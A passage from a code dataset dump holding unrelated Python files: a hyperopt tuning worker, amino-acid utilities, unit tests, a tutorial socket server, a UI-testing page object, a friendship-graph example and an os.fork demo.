force=True)\nimport os\nimport sys\n# stderr = sys.stderr\n# sys.stderr = open(os.devnull, 'w')\nimport random\nfrom hyperopt import hp, fmin, tpe, space_eval, rand, Trials, atpe, trials_from_docs\nfrom hyperopt.fmin import generate_trials_to_calculate\nfrom subRun import subRun\nimport pickle\nimport itertools\nimport hyperopt.pyll.stochastic\nfrom config import space, data_file, num_trials, number_of_features, num_thread_random, num_trials_random, num_thread_guided, num_trials_guided, number_iterations, history_length, num_thread_historical\nimport numpy as np\nimport multiprocessing\nimport random\n#%% tune and run\nhistorical_hyperparameter_history = 'historicalHyperparameter'\nhistoricalRecordDir = 'historicalRecord'\nrandomRecordDir = 'randomRecord'\nguidedRecordDir = 'guidedRecord'\n\nrandom.seed(1)\n\n\n# global thread_random_search\n\ndef thread_historical_search(id, trials):\n fmin(fn=subRun, space=space, algo=rand.suggest, max_evals=1,\n trials=trials, catch_eval_exceptions=True)\n with open('{}/{}'.format(historicalRecordDir, id), 'wb') as f:\n pickle.dump(trials, f)\n\ndef thread_random_search(id):\n trials = Trials()\n fmin(fn=subRun, space=space, algo=rand.suggest, max_evals=len(trials) + num_trials_random,\n trials=trials, catch_eval_exceptions=True)\n with open('{}/{}'.format(randomRecordDir, id), 'wb') as f:\n pickle.dump(trials, f)\n\n# global thread_guided_search\ndef thread_guided_search(id, trials):\n fmin(fn=subRun, space=space, algo=tpe.suggest, max_evals=len(trials) + num_trials_guided,\n trials=trials, catch_eval_exceptions=True)\n with open('{}/{}'.format(guidedRecordDir, id), 'wb') as f:\n pickle.dump(trials.trials[-num_trials_guided:], f)\n\ndef doTune(data):\n\n #%% pass data\n with open(data_file, \"wb\") as f:\n pickle.dump(data, f)\n\n #%% auto tuning\n if not os.path.exists(historicalRecordDir):\n os.makedirs(historicalRecordDir)\n\n if not 
os.path.exists(randomRecordDir):\n os.makedirs(randomRecordDir)\n\n if not os.path.exists(guidedRecordDir):\n os.makedirs(guidedRecordDir)\n\n # id pool\n max_id = 0 # id counter\n id_pool_random = []\n id_pool_guided = []\n # load previous hyperparamters and generate baseline historical trials record\n id_pool_historical = []\n historical_trials = Trials()\n if os.path.exists(historical_hyperparameter_history):\n with open(historical_hyperparameter_history, 'rb') as f:\n historical_hyperparameters = pickle.load(f) # historical_hyperparameters = [{'a': [1], 'c1': [], 'c2': [-0.13475270138215323]}]\n # split trials\n\n adapted_num_thread_historical = min(len(historical_hyperparameters), num_thread_historical)\n smallTrialsList = []\n sub_length = len(historical_hyperparameters) // adapted_num_thread_historical\n\n for i in range(adapted_num_thread_historical):\n if i == adapted_num_thread_historical - 1:\n smallTrialsList.append(generate_trials_to_calculate(historical_hyperparameters))\n else:\n smallTrialsList.append(generate_trials_to_calculate(historical_hyperparameters[:sub_length]))\n historical_hyperparameters = historical_hyperparameters[sub_length:]\n\n pool = multiprocessing.Pool(processes=adapted_num_thread_historical)\n for smallTrials in smallTrialsList:\n id = max_id\n max_id += 1\n id_pool_historical.append(id)\n pool.apply_async(thread_historical_search, args=(id, smallTrials))\n\n pool.close()\n pool.join()\n\n # merge trials, assign to historical_trials\n for id in id_pool_historical:\n with open('{}/{}'.format(historicalRecordDir, id), 'rb') as f:\n historical_trials = trials_from_docs(list(historical_trials) + list(pickle.load(f)))\n\n for _ in range(number_iterations):\n # random phase\n pool = multiprocessing.Pool(processes=num_thread_random)\n\n for _ in range(num_thread_random):\n id = max_id\n max_id += 1\n id_pool_random.append(id)\n pool.apply_async(thread_random_search, args=(id,))\n\n pool.close()\n pool.join()\n\n # loading random and guided pool\n merged_trials = Trials()\n for id in id_pool_random:\n with open('{}/{}'.format(randomRecordDir, id), 'rb') as f:\n merged_trials = trials_from_docs(list(merged_trials) + list(pickle.load(f)))\n\n for id in id_pool_guided:\n with open('{}/{}'.format(guidedRecordDir, id), 'rb') as f:\n merged_trials = trials_from_docs(list(merged_trials) + list(pickle.load(f)))\n\n # merge merged trials with historical trials\n merged_trials = trials_from_docs(list(merged_trials) + list(historical_trials))\n # guided phase\n pool = multiprocessing.Pool(processes=num_thread_guided)\n\n for _ in range(num_thread_guided):\n id = max_id\n max_id += 1\n id_pool_guided.append(id)\n pool.apply_async(thread_guided_search, args=(id, merged_trials))\n\n pool.close()\n pool.join()\n\n # aggregate\n merged_trials = Trials()\n for id in id_pool_random:\n with open('{}/{}'.format(randomRecordDir, id), 'rb') as f:\n merged_trials = trials_from_docs(list(merged_trials) + list(pickle.load(f)))\n\n for id in id_pool_guided:\n with open('{}/{}'.format(guidedRecordDir, id), 'rb') as f:\n merged_trials = trials_from_docs(list(merged_trials) + list(pickle.load(f)))\n\n # merge with historical trials\n merged_trials = trials_from_docs(list(merged_trials) + list(historical_trials))\n\n # extract hyperparemters\n best = fmin(fn=subRun, space=space, algo=tpe.suggest, max_evals=0, trials=merged_trials,\n catch_eval_exceptions=True, verbose=False)\n\n hyperparameters = space_eval(space, best)\n\n # save hyperparameters\n # if historical_trials contains 
merged_trials.best_trial, updated_historical_trials = historical_trials\n def twoTrialsAreSame(trialA, trialB):\n same = True\n for key in trialA['misc']['vals']:\n if trialA['misc']['vals'][key][0] != trialB['misc']['vals'][key][0]:\n same = False\n\n return same\n\n bestTrialAlreadyIncluded = False\n for trial in historical_trials.trials:\n if twoTrialsAreSame(trial, merged_trials.best_trial):\n bestTrialAlreadyIncluded = True\n if bestTrialAlreadyIncluded:\n updated_historical_trials = historical_trials\n else:\n updated_historical_trials = trials_from_docs(list([merged_trials.best_trial]) + list(historical_trials))\n\n with open(historical_hyperparameter_history, 'wb') as f:\n # get a list of trials, sort trials by loss, select the top history_length ones, get the parameter-value dictionary\n historical_hyperparameters = [h['misc']['vals'] for h in sorted(updated_historical_trials.trials, key=lambda k: k['result']['loss'])[: history_length]]\n for historical_hyperparameter in historical_hyperparameters: # unbox the singleton list, to make it ready for producing Trials object\n for key in historical_hyperparameter:\n historical_hyperparameter[key] = historical_hyperparameter[key][0]\n\n pickle.dump(historical_hyperparameters, f)\n\n return hyperparameters\n\n#%%\n# hyperopt.pyll.stochastic.sample(space)\n","sub_path":"covidProject/caseOnly_MAE_CNN/tuneWorker.py","file_name":"tuneWorker.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"181906952","text":"import sys\n\ndef AA1toAA3(aa, verbose=True):\n if(aa == 'A'):\n return \"ALA\"\n elif(aa == 'C'):\n return \"CYS\"\n elif(aa == 'D'):\n return \"ASP\"\n elif(aa == 'E'):\n return(\"GLU\")\n elif(aa == 'F') :\n return(\"PHE\")\n elif(aa == 'G') :\n return(\"GLY\")\n elif(aa == 'H') :\n return(\"HIS\")\n elif(aa == 'I') :\n return(\"ILE\")\n elif(aa == 'K') :\n return(\"LYS\")\n elif(aa == 'L') :\n return(\"LEU\")\n elif(aa == 'M') :\n return(\"MET\")\n elif(aa == 'N') :\n return(\"ASN\")\n elif(aa == 'P') :\n return(\"PRO\")\n elif(aa == 'Q') :\n return(\"GLN\")\n elif(aa == 'R') :\n return(\"ARG\")\n elif(aa == 'S') :\n return(\"SER\")\n elif(aa == 'T') :\n return(\"THR\")\n elif(aa == 'V') :\n return(\"VAL\")\n elif(aa == 'W') :\n return(\"TRP\")\n elif(aa == 'Y') :\n return(\"TYR\")\n else :\n if verbose :\n print >>sys.stderr, \"The amino acid \",aa,\" is unknown!\" \n return \"UNK\"\n\ndef AA3toAA1(aa, verbose=True):\n if(aa == 'ALA'):\n return \"A\"\n elif(aa == 'CYS'):\n return \"C\"\n elif(aa == 'ASP'):\n return \"D\"\n elif(aa == 'GLU'):\n return(\"E\")\n elif(aa == 'PHE') :\n return(\"F\")\n elif(aa == 'GLY') :\n return(\"G\")\n elif(aa == 'HIS') :\n return(\"H\")\n elif(aa == 'ILE') :\n return(\"I\")\n elif(aa == 'LYS') :\n return(\"K\")\n elif(aa == 'LEU') :\n return(\"L\")\n elif(aa == 'MET') :\n return(\"M\")\n elif(aa == 'ASN') :\n return(\"N\")\n elif(aa == 'PRO') :\n return(\"P\")\n elif(aa == 'GLN') :\n return(\"Q\")\n elif(aa == 'ARG') :\n return(\"R\")\n elif(aa == 'SER') :\n return(\"S\")\n elif(aa == 'THR') :\n return(\"T\")\n elif(aa == 'VAL') :\n return(\"V\")\n elif(aa == 'TRP') :\n return(\"W\")\n elif(aa == 'TYR') :\n return(\"Y\")\n # non standart amino acid / translation accorded to ProDyn web site http://www.csb.pitt.edu/prody/reference/atomic/flags.html\n elif (aa == 'ASX' ) : # asparagine or aspartic acid\n return \"B\" \n elif (aa == 'GLX' ) : # glutamine or glutamic acid\n return \"Z\" \n elif (aa == 
'CSO') : # S-hydroxycysteine\n        return \"C\" \n    elif (aa == 'HIP' ) : # ND1-phosphohistidine\n        return \"H\" \n    elif (aa == 'HSD' ) : # prototropic tautomer of histidine, H on ND1 (CHARMM)\n        return \"H\" \n    elif (aa == 'HSE' ) : # prototropic tautomer of histidine, H on NE2 (CHARMM)\n        return \"H\" \n    elif (aa == 'HSP' ) : # protonated histidine\n        return \"H\" \n    elif (aa == 'MSE' ) : # selenomethionine\n        return \"X\" \n    elif (aa == 'SEC' ) : # selenocysteine\n        return \"X\" \n    elif (aa == 'SEP' ) : # phosphoserine\n        return \"S\" \n    elif (aa == 'TPO' ) : # phosphothreonine\n        return \"T\" \n    elif (aa == 'PTR' ) : # O-phosphotyrosine\n        return \"Y\" \n    elif (aa == 'XLE' ) : # leucine or isoleucine\n        return \"L\" # or I\n    elif (aa == 'XAA') : # unspecified or unknown\n        return \"X\" \n    else :\n        if verbose :\n            print >>sys.stderr, \"The amino acid \",aa,\" is unknown!\" \n        return \"X\"\n        #raise ValueError( \"The amino acid \",aa,\" is unknown!\" ) \n\nclass Residu :\n\n    def __init__(self, name = \"\", numRes = -1 , chain = \"A\" ) :\n        self.name = name\n        self.numRes = numRes\n        self.chain = chain\n\n    def __repr__(self) :\n        return \"%s %d %s \"%(self.name, self.numRes, self.chain)\n\n    def convertAA(self) :\n        if len(self.name)>1:\n            return AA3toAA1(self.name)\n        else :\n            return AA1toAA3(self.name)\n\nveryHydrophobic = [\"VAL\",\"ILE\", \"LEU\", \"MET\", \"PHE\", \"TRP\", \"CYS\"]\nlessHydrophobic = [\"ALA\", \"TYR\", \"HIS\", \"THR\", \"SER\", \"PRO\", \"GLY\"]\nhydrophobic = veryHydrophobic+lessHydrophobic\npolar = [\"ARG\", \"LYS\", \"ASP\", \"GLU\", \"ASN\", \"GLN\"]\nlessPolar = [\"HIS\", \"ALA\", \"TYR\", \"THR\", \"SER\", \"PRO\", \"GLY\" ]\ntiny = [\"GLY\", \"ALA\", \"SER\", \"PRO\"]\nsmall = [\"THR\",\"ASP\",\"ASN\"]\naliphatic = [\"ILE\", \"VAL\", \"LEU\", \"ALA\", \"PRO\" ]\naliphaticExtended = aliphatic + [\"MET\"]\nchargedNeg = [ \"GLU\", \"ASP\"]\nchargedPlus = [\"ARG\", \"LYS\"]\nhydrophilic = ['GLN', 'ASN', 'LYS', 'ASP', 'ARG', 'GLU']\nchargedPlusExtended = chargedPlus+[\"HIS\"]\naromatic = [\"PHE\", \"TRP\", \"TYR\", \"HIS\" ]\nall = ['CYS', 'GLN', 'ILE', 'SER', 'VAL', 'GLY', 'ASN', 'PRO', 'LYS', 'ASP', 'THR', 'PHE', 'ALA', 'MET', 'HIS', 'LEU', 'ARG', 'TRP', 'GLU', 'TYR', 'UNK']\n\nAA3 = ['CYS', 'GLN', 'ILE', 'SER', 'VAL', 'GLY', 'ASN', 'PRO', 'LYS', 'ASP', 'THR', 'PHE', 'ALA', 'MET', 'HIS', 'LEU', 'ARG', 'TRP', 'GLU', 'TYR', 'UNK']\nAA1 = [ AA3toAA1(aa, verbose=False) for aa in AA3 ]\n\ndicAA1Type = {\n    \"hydrophobic\" : [\"V\",\"I\", \"L\", \"M\", \"F\", \"W\", \"C\", \"Y\", \"H\", \"T\" ],\n    \"hydrophilic\" : ['Q', 'N', 'K', 'D', 'R', 'E'],\n    \"tiny\" : [\"G\", \"A\", \"S\", \"P\"] ,\n}\n\ndicAA3Type = {\n    \"hydrophobic\" : [\"VAL\",\"ILE\", \"LEU\", \"MET\", \"PHE\", \"TRP\", \"CYS\", \"ALA\", \"TYR\", \"HIS\", \"THR\", \"SER\", \"PRO\", \"GLY\" ],\n    \"hydrophilic\" : ['GLN', 'ASN', 'LYS', 'ASP', 'ARG', 'GLU'],\n    \"tiny\" : [\"GLY\", \"ALA\", \"SER\", \"PRO\"] ,\n}\n\nisHydrophobe_AA3 = {\"ALA\": True ,\n\"CYS\": True ,\n\"ASP\": False ,\n\"GLU\": False ,\n\"PHE\": True ,\n\"GLY\": True ,\n\"HIS\": False ,\n\"ILE\": True ,\n\"LYS\": False ,\n\"LEU\": True ,\n\"MET\": True ,\n\"ASN\": False ,\n\"PRO\": True ,\n\"GLN\": False ,\n\"ARG\": False ,\n\"SER\": False ,\n\"THR\": True ,\n\"VAL\": True ,\n\"TRP\": True ,\n\"TYR\": True ,\n\"UNK\": False\n}\n\nisHydrophobe_AA1 = {\"A\": True ,\n\"C\": True ,\n\"D\": False ,\n\"E\": False ,\n\"F\": True ,\n\"G\": True ,\n\"H\": False ,\n\"I\": True ,\n\"K\": False ,\n\"L\": True ,\n\"M\": True ,\n\"N\": False ,\n\"P\": True ,\n\"Q\": False ,\n\"R\": 
False ,\n\"S\": False ,\n\"T\": True ,\n\"V\": True ,\n\"W\": True ,\n\"Y\": True ,\n\"U\": False\n}\n\n\nResiduHeavyAtom = {\n\"A\": [\"N\",\"CA\",\"C\",\"O\",\"CB\"] ,\n\"C\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"SG\"] ,\n\"D\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"OD1\",\"OD2\"] ,\n\"E\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\",\"OE1\",\"OE2\"] ,\n\"F\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD2\",\"CE2\",\"CZ\",\"CE1\",\"CD1\"] ,\n\"G\": [\"N\",\"CA\",\"C\",\"O\"] ,\n\"H\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD2\",\"NE2\",\"CE1\",\"ND1\"] ,\n\"I\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG1\",\"CG2\",\"CD1\"] ,\n\"K\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\",\"CE\",\"NZ\"] ,\n\"L\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD1\",\"CD2\"] ,\n\"M\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"SD\",\"CE\"] ,\n\"N\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"OD1\",\"ND2\"] ,\n\"P\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\"] ,\n\"Q\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\",\"OE1\",\"NE2\"] ,\n\"R\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD\",\"NE\",\"CZ\",\"NH1\",\"NH2\"] ,\n\"S\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"OG\"] ,\n\"T\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG2\",\"OG1\"] ,\n\"V\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG1\",\"CG2\"] ,\n\"W\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD1\",\"NE1\",\"CE2\",\"CZ2\",\"CH2\",\"CZ3\",\"CE3\",\"CD2\"] ,\n\"Y\": [\"N\",\"CA\",\"C\",\"O\",\"CB\",\"CG\",\"CD1\",\"CD2\",\"CE1\",\"CE2\",\"CZ\",\"OH\"],\n\"U\": []\n}\n\n\nResiduSideChainHeavyAtom = {\n\"A\": [\"CB\"] ,\n\"C\": [\"CB\",\"SG\"] ,\n\"D\": [\"CB\",\"CG\",\"OD1\",\"OD2\"] ,\n\"E\": [\"CB\",\"CG\",\"CD\",\"OE1\",\"OE2\"] ,\n\"F\": [\"CB\",\"CG\",\"CD2\",\"CE2\",\"CZ\",\"CE1\",\"CD1\"] ,\n\"G\": [] ,\n\"H\": [\"CB\",\"CG\",\"CD2\",\"NE2\",\"CE1\",\"ND1\"] ,\n\"I\": [\"CB\",\"CG1\",\"CG2\",\"CD1\"] ,\n\"K\": [\"CB\",\"CG\",\"CD\",\"CE\",\"NZ\"] ,\n\"L\": [\"CB\",\"CG\",\"CD1\",\"CD2\"] ,\n\"M\": [\"CB\",\"CG\",\"SD\",\"CE\"] ,\n\"N\": [\"CB\",\"CG\",\"OD1\",\"ND2\"] ,\n\"P\": [\"CB\",\"CG\",\"CD\"] ,\n\"Q\": [\"CB\",\"CG\",\"CD\",\"OE1\",\"NE2\"] ,\n\"R\": [\"CB\",\"CG\",\"CD\",\"NE\",\"CZ\",\"NH1\",\"NH2\"] ,\n\"S\": [\"CB\",\"OG\"] ,\n\"T\": [\"CB\",\"CG2\",\"OG1\"] ,\n\"V\": [\"CB\",\"CG1\",\"CG2\"] ,\n\"W\": [\"CB\",\"CG\",\"CD1\",\"NE1\",\"CE2\",\"CZ2\",\"CH2\",\"CZ3\",\"CE3\",\"CD2\"] ,\n\"Y\": [\"CB\",\"CG\",\"CD1\",\"CD2\",\"CE1\",\"CE2\",\"CZ\",\"OH\"],\n\"U\": []\n}\n","sub_path":"myBio/structure/Residu.py","file_name":"Residu.py","file_ext":"py","file_size_in_byte":7486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"34684388","text":"import time\nimport traceback\nimport unittest\nfrom hyd.analysis.save_result import SaveResult\nfrom hyd.realtime import enums\nfrom hyd.analysis.out2dict import OutToDict\n\n\nclass TestAnalysis(unittest.TestCase):\n\n def test_save(self):\n t = time.time()\n try:\n s = SaveResult('online_after', enums.OnlineType.YUCE)\n s.main()\n except Exception:\n traceback.print_exc()\n print(f'time used {time.time() - t}')\n\n def test_pump_freq(self):\n all_data = OutToDict('online_after').get_data()\n num_periods = all_data['num_periods']\n df_nodes = all_data['df_nodes']\n df_links = all_data['df_links']\n temp_df_link = df_links.loc[0]\n status = int(temp_df_link.loc[freq_key, constants.LINK_FIELD_STATUS])\n status = constants.OPEN if status == 1 else constants.CLOSED\n frequency = str(round(float(temp_df_link.loc[freq_key, constants.LINK_FREQUENCY]) * 
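The converters in the Residu.py record above are long if/elif ladders; the same mapping is normally kept as a dictionary plus one inversion. A sketch covering only the 20 standard residues (the modified-residue aliases such as MSE or SEP would need extra entries):

```python
import sys

# Forward table for the 20 standard residues; invert it once for the
# three-letter direction. Modified residues (MSE, SEP, ...) are omitted here.
AA1_TO_AA3 = {
    "A": "ALA", "C": "CYS", "D": "ASP", "E": "GLU", "F": "PHE",
    "G": "GLY", "H": "HIS", "I": "ILE", "K": "LYS", "L": "LEU",
    "M": "MET", "N": "ASN", "P": "PRO", "Q": "GLN", "R": "ARG",
    "S": "SER", "T": "THR", "V": "VAL", "W": "TRP", "Y": "TYR",
}
AA3_TO_AA1 = {three: one for one, three in AA1_TO_AA3.items()}

def aa3_to_aa1(aa, verbose=True):
    one = AA3_TO_AA1.get(aa.upper())
    if one is None:
        if verbose:
            sys.stderr.write("The amino acid %s is unknown!\n" % aa)
        return "X"
    return one
```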
50, 1))\n        ptime = (self.dt + timedelta(minutes=5 * peri)).strftime(constants.FORMAT_DATA_DATE)\n","sub_path":"src/test/test_save.py","file_name":"test_save.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"163502935","text":"\"\"\"\n    Tests for the :mod:`regression_tests.web.utils` module.\n\"\"\"\n\nimport unittest\n\nfrom regression_tests.test_case import TestCaseName\nfrom regression_tests.web.utils import interactive_case_name\nfrom regression_tests.web.utils import limit_shown_commits\n\n\nclass InteractiveCaseNameTests(unittest.TestCase):\n    \"\"\"Tests for `interactive_case_name()`.\"\"\"\n\n    def test_puts_proper_onclick_action_for_tool_with_args(self):\n        self.assertEqual(\n            interactive_case_name(\n                TestCaseName('TestCase (file.exe -a x86)'),\n                'dir.subdir'\n            ),\n            \"\"\"TestCase (file.exe -a x86)\"\"\"\n        )\n\n    def test_puts_proper_onclick_action_for_tool_without_args(self):\n        # It checks that there is no redundant space after the input file when\n        # there are no additional tool arguments.\n        self.assertEqual(\n            interactive_case_name(\n                TestCaseName('TestCase (file.exe)'),\n                'dir.subdir'\n            ),\n            \"\"\"TestCase (file.exe)\"\"\"\n        )\n\n    def test_shortens_long_case_name_when_limit_is_given(self):\n        self.assertEqual(\n            interactive_case_name(\n                TestCaseName('TestCase (file.exe)'),\n                'dir.subdir',\n                limit=2\n            ),\n            \"\"\"TestCase (file[..])\"\"\"\n        )\n\n\nclass LimitShownCommitsTests(unittest.TestCase):\n    \"\"\"Tests for `limit_shown_commits()`.\"\"\"\n\n    def test_returns_max_count_when_selected_count_is_zero(self):\n        self.assertEqual(limit_shown_commits('0', 5), 5)\n\n    def test_returns_selected_count_when_less_than_max_count(self):\n        self.assertEqual(limit_shown_commits('4', 5), 4)\n\n    def test_returns_max_count_when_more_than_max_count(self):\n        self.assertEqual(limit_shown_commits('6', 5), 5)\n\n    def test_returns_max_count_when_selected_count_is_invalid(self):\n        self.assertEqual(limit_shown_commits('a', 5), 5)\n","sub_path":"tests/web/utils_tests.py","file_name":"utils_tests.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"379737101","text":"import socket\nimport threading\n\n\n\nclass ThreadForClient(threading.Thread):\n    def __init__(self, conn):\n        threading.Thread.__init__(self)\n        self.conn = conn\n\n    def run(self):\n        data = self.conn.recv(1024)\n        data = data.decode(\"utf8\")\n        print(data)\n\n\nhost, port = ('', 5556)\n\nsocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsocket.bind((host, port))\nprint(\"The server is started!\")\n\nwhile True:\n    socket.listen()\n    conn, address = socket.accept()\n    print(\"A client has just connected ...\")\n\n    \"\"\" Commented out because of the use of Thread\n    data = conn.recv(1024)\n    data = data.decode(\"utf8\")\n    print(data)\n    \"\"\"\n\n    my_thread = ThreadForClient(conn)\n    my_thread.start()\n\n\nconn.close()\nsocket.close()","sub_path":"Tuto_Python3/22_socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"385755730","text":"import cv2\nimport time\nimport numpy as np\nimport pywinauto\nfrom pywinauto import Application\nfrom selene import browser\nfrom selene.support import by\nfrom selene.api import *\nfrom selene.support.jquery_style_selectors import s, ss\n# config.browser_name = 'chrome'\nfrom PIL import 
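The thread-per-connection server in the record above can also be written with the standard library's `socketserver` module (Python 3.6+ for the context-manager form), which owns the accept loop and spawns one handler per client; a minimal sketch on the same port:

```python
import socketserver

class EchoHandler(socketserver.BaseRequestHandler):
    def handle(self):
        # self.request is the connected socket for this client.
        data = self.request.recv(1024).decode("utf8")
        print(data)

with socketserver.ThreadingTCPServer(("", 5556), EchoHandler) as server:
    server.serve_forever()
```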
Image\n\n# from selenium.webdriver.chrome.options import Options\n# from selenium import webdriver\n# from webdriver_manager.chrome import ChromeDriverManager\n# chrome_options = Options()\n# chrome_options.add_argument(\"--headless\")\n# chrome_options.add_argument(\"--window-size=1920x1080\")\n#\n# driver = webdriver.Chrome(ChromeDriverManager().install(), chrome_options=chrome_options,)\n# browser.set_driver(driver)\n\nclass MainPage(object):\n def __init__(self):\n self._header = s('app-lbl[ng-reflect-key=\"Header_Toolbar_WelcomeTo\"]')\n self.pl = s(by.xpath('//div[text()=\"PL\"]'))\n self.en = s(by.xpath('//div[text()=\"EN\"]'))\n ############################################################\n self._new_job_mane = s('#jobsListNewJobNameInput')\n self._add_button = s('#jobsListNewJobNameButton')\n self.jobs_list = ss(by.xpath(' //*[starts-with(@id,\"jobsListJob\")]//h3'))\n self.first_job = browser.element(by.xpath(' (//*[starts-with(@id,\"jobsListJob\")]//h3)[1]'))\n self.removes = browser.elements(by.xpath('//h3[@class=\"mat-line\"]/../../button'))\n self._body = s('mat-toolbar.mat-primary > span:nth-child(1)')\n self.job = 'h3.mat-line'\n self.work_plate = '#canvasPanel'\n ############################################################\n self.allert = s(by.xpath('//snack-bar-container//span'))\n ############################################################\n self.work_tab = s(by.xpath('//app-lbl[text()=\"Work\"]'))\n\n def job(self, name):\n return '//h3[contains(text(), \"{}\")]'.format(name)\n\n def open(self):\n browser.open_url(\"/\")\n return self\n\n def add_job(self, name):\n self._new_job_mane.set(name)\n self._add_button.click()\n return self\n\n def test_upload_from_pc(self):\n s('#jobsListAttachJobButton').click()\n app = Application().connect(title_re=\"Open*\")\n app.Open.Edit.set_edit_text('C:\\\\Users\\\\ssoloshchenko\\\\Desktop\\\\jobs\\\\vector .pdf') # update path to local file\n while True:\n try:\n app.Open.Button.click() # open button is getting focused\n except pywinauto.findbestmatch.MatchError:\n break\n time.sleep(1)\n return self\n\n def remove_job(self, job_name):\n s(by.xpath('//h3[contains(text(), \"{}\")]/../..//button[starts-with(@id,\"jobsListJobDeleteButton\")]'\n .format(job_name))).click()\n return self\n # def remove_jobs(self, *jobs):\n # for job in jobs:\n # s(by.xpath('//h3[contains(text(), \"{}\")]/../../button'.format(job))).click()\n # return self\n\n def remove_all_jobs(self):\n time.sleep(1)\n jobs = ss(by.xpath('//button[starts-with(@id,\"jobsListJobDeleteButton\")]'))\n count = len(jobs)\n while count >= 1:\n jobs[count - 1].click()\n time.sleep(0.1)\n count -= 1\n return self\n\n def compare_screens(self, name_expected, path, image_folder, test):\n expected = cv2.imread(name_expected)\n actual = cv2.imread(path)\n difference = cv2.subtract(expected, actual)\n result = not np.any(difference)\n if result is True:\n print(\"Images are same\")\n return True\n else:\n cv2.imwrite('{}\\\\{}.png'.format(image_folder, test), difference)\n print('Images are different')\n return False\n\n def compare(self, f, name, name_expected, test):\n image_folder = f\n time.sleep(2)\n #Will take a screenshot as png and will place it in newly created folder\n path = browser.take_screenshot(path=image_folder, filename='{}'.format(name))\n return self.compare_screens(name_expected, path, image_folder, test)\n\n def screenshot(self, f, name):\n image_folder = f\n time.sleep(2)\n browser.take_screenshot(path=image_folder, filename='{}'.format(name))\n\n def 
compare_canvas(self, f, name, name_expected, test):\n        time.sleep(1)\n        #TODO add object as a parameter\n        image_folder = f\n        element = s(\"#canvas123\")\n        location = element.location\n        size = element.size\n        path = browser.take_screenshot(path=image_folder, filename='{}'.format(name))\n        x = location['x']\n        y = location['y']\n        width = location['x'] + size['width']\n        height = location['y'] + size['height']\n        im = Image.open(path)\n        im = im.crop((int(x), int(y), int(width), int(height)))\n        im.save(path)\n        return self.compare_screens(name_expected, path, image_folder, test)\n\n\n","sub_path":"src/main_page.py","file_name":"main_page.py","file_ext":"py","file_size_in_byte":4920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"11226552","text":"users = [\n    { \"id\": 0, \"name\": \"Hero\" },\n    { \"id\": 1, \"name\": \"Dunn\" },\n    { \"id\": 2, \"name\": \"Sue\" },\n    { \"id\": 3, \"name\": \"Chi\" },\n    { \"id\": 4, \"name\": \"Thor\" },\n    { \"id\": 5, \"name\": \"Clive\" },\n    { \"id\": 6, \"name\": \"Hicks\" },\n    { \"id\": 7, \"name\": \"Devin\" },\n    { \"id\": 8, \"name\": \"Kate\" },\n    { \"id\": 9, \"name\": \"Klein\" },\n    ]\n\nfriendship_pairs = [(0, 1), (0, 2), (1, 2), (1, 3), (2, 3), (3, 4),\n                    (4, 5), (5, 6), (5, 7), (6, 8), (7, 8), (8, 9)]\n\n# To find all the friendships for one user we will build an adjacency list\n\nfriendships = {item[\"id\"]: [] for item in users} # initialize each user's friendship list as empty\n\nfor i, j in friendship_pairs:\n    friendships[i].append(j) # Add j as a friend of user i\n    friendships[j].append(i) # Add i as a friend of user j\n\n\ndef number_of_friends(user):\n    user_id = user[\"id\"]\n    friends = friendships[user_id]\n    return len(friends)\n\n\ndef total_connections():\n    return sum(number_of_friends(user) for user in users)\n\n\ndef average_connections():\n    return total_connections() / len(users)\n\n# print(number_of_friends(users[3])) --> 3\n\n\n'''to find the most connected users we need to have a list of the users sorted by number of friends'''\n\n\ndef most_connections():\n    users_by_number_of_friends = [(user[\"id\"], number_of_friends(user)) for user in users]\n    users_by_number_of_friends.sort(key=lambda x: x[1], reverse=True)\n    return users_by_number_of_friends\n\n\ndef print_by_number_of_friends():\n    curr_list = most_connections()\n    print(curr_list)\n    \n    \nprint_by_number_of_friends() \n\n# Output\n# [(1, 3), (2, 3), (3, 3), (5, 3), (8, 3), (0, 2), (4, 2), (6, 2), (7, 2), (9, 1)]\n# This result doesn't mean the user with id = \"1\" is the most centralized user in our network\n\nprint(average_connections())\n# Output\n# 2.4\n","sub_path":"Finding-Key-Connectors.py","file_name":"Finding-Key-Connectors.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"541910035","text":"\"\"\"\n    fork creates a new process\n\"\"\"\nimport os\nfrom time import sleep\npid = os.fork()\nif pid < 0:\n    print('failed')\n# executed in the child process\nelif pid == 0:\n    sleep(3)\n    print('new',pid)\n# executed in the parent process\nelse:\n    sleep(4)\n    